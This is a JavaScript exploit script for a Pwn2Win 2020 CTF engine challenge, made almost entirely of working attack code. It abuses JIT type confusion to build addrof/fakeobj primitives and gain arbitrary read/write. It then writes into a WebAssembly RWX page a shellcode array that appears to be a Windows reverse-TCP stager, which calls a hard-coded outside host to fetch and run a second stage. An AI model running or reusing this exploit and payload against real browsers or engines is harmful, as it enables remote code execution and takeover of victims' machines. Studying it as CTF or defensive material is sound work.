Exploit for OmniTizer challenge from Pwn2Win 2020
// Reads i[0]..i[3] and returns i[0]. The first four reads are discarded and
// have no effect in plain JS semantics; presumably they are there to shape
// how the engine optimizes this function after the warm-up loops below —
// TODO confirm against the challenge's engine patch.
function r(i) {
i[0];
i[1];
i[2];
i[3];
return i[0];
}
// Stores v into i[0] after the same four discarded reads as r(). Returns
// undefined (callers that capture its result get nothing useful).
function w(i, v) {
i[0];
i[1];
i[2];
i[3];
i[0] = v;
}
// Reads properties a..d of i (values discarded) and returns i.b.
function dr(i) {
i.a;
i.b;
i.c;
i.d;
return i.b;
}
// Warm-up: each helper is called 1,000,000 times with constant arguments and
// the results are discarded. In JS semantics this only costs time; presumably
// it is there so the engine has optimized r/w/dr before they are used on
// mixed-type inputs below — TODO confirm.
for (var j = 0; j < 1000000; j++) {r([1.1,1.1,1.1,1.1,1.1]);}
for (var j = 0; j < 1000000; j++) {w([1.1,1.1,1.1,1.1,1.1], 2.2);}
for (var j = 0; j < 1000000; j++) {dr({a: 1.1, b: 1.1, c: 1.1, d: 1.1});}
// Reinterprets the IEEE-754 bits of f and returns one 32-bit half as an
// unsigned integer. The DataView is used in its default big-endian mode, so
// off === 0 yields the upper 32 bits and off === 4 the lower 32 bits.
function f2h(f, off) {
  const view = new DataView(new ArrayBuffer(8));
  view.setFloat64(0, f, false);
  return view.getUint32(off, false);
}
// Builds a double from two 32-bit halves. Note the placement: with the
// big-endian DataView default, l is written to bytes 0-3 (the upper 32 bits
// of the result) and h to bytes 4-7 (the lower 32 bits). Inverse of f2h:
// f2h(h2f(h, l), 4) === h and f2h(h2f(h, l), 0) === l.
function h2f(h, l) {
  const view = new DataView(new ArrayBuffer(8));
  view.setUint32(0, l, false);
  view.setUint32(4, h, false);
  return view.getFloat64(0, false);
}
// Calls r() on an array whose first element is obj and returns the lower
// 32 bits of the returned value via f2h(..., 4). In standard JS semantics r()
// simply returns obj; the numeric result only has meaning under the engine
// behaviour this script targets.
function addrof(obj) {
var raw = r([obj, [], [], [], []]);
//console.log(raw);
return f2h(raw, 4);
}
// Writes h2f(addr, 0) (addr in the lower 32 bits, 0 in the upper) into
// store[0] through w() and returns whatever store[0] then holds.
// NOTE: w() has no return value, so `raw` is always undefined and unused.
function fakeobj(addr) {
var store = [[], [], [], [], []];
var raw = w(store, h2f(addr, 0));
return store[0];
}
// Passes obj as property b to dr() and returns the 32-bit half selected by
// off (0 = upper, 4 = lower, see f2h) of the value dr() returns.
function deref(obj, off) {
var raw = dr({a: 1.1, b: obj});
return f2h(raw, off);
}
// Reads one 8-byte element of f at an index derived from addrof(m) + 0x68 and
// the global `loc`, and returns [that value, addrof(m.exports.main)].
// Both `m` and `loc` are globals assigned later in this file, so this function
// must only be called after those assignments.
// When the distance is not 8-byte aligned the value straddles two elements,
// so the halves of f[idx] and f[idx+1] are recombined through f2h/h2f.
// NOTE: `sub`, `resl` and `resh` are assigned without var/let and become
// implicit globals; this would throw under strict mode.
function nextpart(f) {
var rwxloc = addrof(m) + 0x68;
// %DebugPrint(m);   (d8 native syntax; only available with --allow-natives-syntax)
sub = 0;
if ((rwxloc - loc) % 8 != 0) {sub = 4;}
var rwxidx = (rwxloc - loc - sub) / 8;
var var1 = f[rwxidx];
var var2 = f[rwxidx + 1];
var res = var1;
console.log(rwxidx);
if (sub != 0) {
// Misaligned case: lower half of var2 and upper half of var1, reassembled.
resl = f2h(var1, 0);
resh = f2h(var2, 4);
res = h2f(resl, resh);
console.log("special");
console.log(resl.toString(16));
console.log(resh.toString(16));
console.log(res);
}
return [res, addrof(m.exports.main)];
}
// Hand-assembled WebAssembly module bytes (magic "\0asm", version 1). The
// export section names "memory", "_Z5happyv" and "main" (visible as ASCII in
// the byte array); the function bodies are not otherwise verified here.
var wasmCode = new Uint8Array([0x0,0x61,0x73,0x6d,0x1,0x0,0x0,0x0,0x1,0x85,0x80,0x80,0x80,0x0,0x1,0x60,0x0,0x1,0x7f,0x3,0x83,0x80,0x80,0x80,0x0,0x2,0x0,0x0,0x4,0x84,0x80,0x80,0x80,0x0,0x1,0x70,0x0,0x0,0x5,0x83,0x80,0x80,0x80,0x0,0x1,0x0,0x1,0x6,0x81,0x80,0x80,0x80,0x0,0x0,0x7,0x9d,0x80,0x80,0x80,0x0,0x3,0x6,0x6d,0x65,0x6d,0x6f,0x72,0x79,0x2,0x0,0x9,0x5f,0x5a,0x35,0x68,0x61,0x70,0x70,0x79,0x76,0x0,0x0,0x4,0x6d,0x61,0x69,0x6e,0x0,0x1,0xa,0x93,0x80,0x80,0x80,0x0,0x2,0x84,0x80,0x80,0x80,0x0,0x0,0x41,0x2b,0xb,0x84,0x80,0x80,0x80,0x0,0x0,0x41,0x2a,0xb]);
var wasmMod = new WebAssembly.Module(wasmCode);
var m = new WebAssembly.Instance(wasmMod);
console.log(m);
// NOTE: fakearr_data is declared with `var` on the next line, so this prints
// `undefined` (the binding is hoisted but not yet assigned).
console.log(fakearr_data);
// Engine/build-specific 32-bit constants; their meaning cannot be verified
// from this file alone.
var fakearr_data = [h2f(0x08241909, 0x080406e9), 0.1, 0.2];
var loc = deref(fakearr_data, 0)   // no trailing semicolon; ASI terminates the statement
console.log(loc.toString(16));
// Both entries place the constant in the lower 32 bits and 0x80000 in the
// upper 32 bits (see h2f's argument placement).
fakearr_data[1] = h2f(loc + 0x18, 0x80000);
fakearr_data[2] = h2f(0x08040a3d, 0x80000);
var fakearr = fakeobj(deref(fakearr_data, 0) + 8);
loc += 0x20;
var arrbuf = new ArrayBuffer(0x1000);
var dv = new DataView(arrbuf);
var arrbuf_loc = addrof(arrbuf);
console.log(arrbuf_loc);
console.log(loc);
// Element index into fakearr derived from the distance between arrbuf_loc
// and loc; the result is only integral when that distance is a multiple of 8.
var beginidx = (arrbuf_loc + 0x20 - loc - 8 -4) / 8;
var backing = fakearr[beginidx];
console.log(fakearr[beginidx]);
// nextpart() reads the globals m and loc assigned above.
var res = nextpart(fakearr);
var rwxpage = res[0];
var fff = fakeobj(res[1]);
console.log(rwxpage);
// %DebugPrint(arrbuf);   (d8 native syntax; only available with --allow-natives-syntax)
var shellcode = [ 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xcc, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x66, 0x81, 0x78, 0x18, 0x0b, 0x02, 0x0f, 0x85, 0x72, 0x00, 0x00, 0x00, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x4b, 0xff, 0xff, 0xff, 0x5d, 0x49, 0xbe, 0x77, 0x73, 0x32, 0x5f, 0x33, 0x32, 0x00, 0x00, 0x41, 0x56, 0x49, 0x89, 0xe6, 0x48, 0x81, 0xec, 0xa0, 0x01, 0x00, 0x00, 0x49, 0x89, 0xe5, 0x49, 0xbc, 0x02, 0x00, 0x11, 0x52, 0x80, 0xc7, 0xd1, 0x0e, 0x41, 0x54, 0x49, 0x89, 0xe4, 0x4c, 0x89, 0xf1, 0x41, 0xba, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x4c, 0x89, 0xea, 0x68, 0x01, 0x01, 0x00, 0x00, 0x59, 0x41, 0xba, 0x29, 0x80, 0x6b, 0x00, 0xff, 0xd5, 0x6a, 0x0a, 0x41, 0x5e, 0x50, 0x50, 0x4d, 0x31, 0xc9, 0x4d, 0x31, 0xc0, 0x48, 0xff, 0xc0, 0x48, 0x89, 0xc2, 0x48, 0xff, 0xc0, 0x48, 0x89, 0xc1, 0x41, 0xba, 0xea, 0x0f, 0xdf, 0xe0, 0xff, 0xd5, 0x48, 0x89, 0xc7, 0x6a, 0x10, 0x41, 0x58, 0x4c, 0x89, 0xe2, 0x48, 0x89, 0xf9, 0x41, 0xba, 
0x99, 0xa5, 0x74, 0x61, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0x0a, 0x49, 0xff, 0xce, 0x75, 0xe5, 0xe8, 0x93, 0x00, 0x00, 0x00, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0xe2, 0x4d, 0x31, 0xc9, 0x6a, 0x04, 0x41, 0x58, 0x48, 0x89, 0xf9, 0x41, 0xba, 0x02, 0xd9, 0xc8, 0x5f, 0xff, 0xd5, 0x83, 0xf8, 0x00, 0x7e, 0x55, 0x48, 0x83, 0xc4, 0x20, 0x5e, 0x89, 0xf6, 0x6a, 0x40, 0x41, 0x59, 0x68, 0x00, 0x10, 0x00, 0x00, 0x41, 0x58, 0x48, 0x89, 0xf2, 0x48, 0x31, 0xc9, 0x41, 0xba, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x48, 0x89, 0xc3, 0x49, 0x89, 0xc7, 0x4d, 0x31, 0xc9, 0x49, 0x89, 0xf0, 0x48, 0x89, 0xda, 0x48, 0x89, 0xf9, 0x41, 0xba, 0x02, 0xd9, 0xc8, 0x5f, 0xff, 0xd5, 0x83, 0xf8, 0x00, 0x7d, 0x28, 0x58, 0x41, 0x57, 0x59, 0x68, 0x00, 0x40, 0x00, 0x00, 0x41, 0x58, 0x6a, 0x00, 0x5a, 0x41, 0xba, 0x0b, 0x2f, 0x0f, 0x30, 0xff, 0xd5, 0x57, 0x59, 0x41, 0xba, 0x75, 0x6e, 0x4d, 0x61, 0xff, 0xd5, 0x49, 0xff, 0xce, 0xe9, 0x3c, 0xff, 0xff, 0xff, 0x48, 0x01, 0xc3, 0x48, 0x29, 0xc6, 0x48, 0x85, 0xf6, 0x75, 0xb4, 0x41, 0xff, 0xe7, 0x58, 0x6a, 0x00, 0x59, 0x49, 0xc7, 0xc2, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5]; | |
// Overwrite the element read above as `backing` with rwxpage, then print the
// first 4 bytes the DataView now observes.
fakearr[beginidx] = rwxpage;
console.log(dv.getUint32(0).toString(16));
// Copy the payload bytes one at a time through the DataView.
for (var i = 0; i < shellcode.length; i++) {
dv.setUint8(i, shellcode[i]);
}
// readline();;
// fff was obtained from fakeobj(res[1]) above; in standard JS it is not
// callable, so this line only works under the targeted engine behaviour.
fff();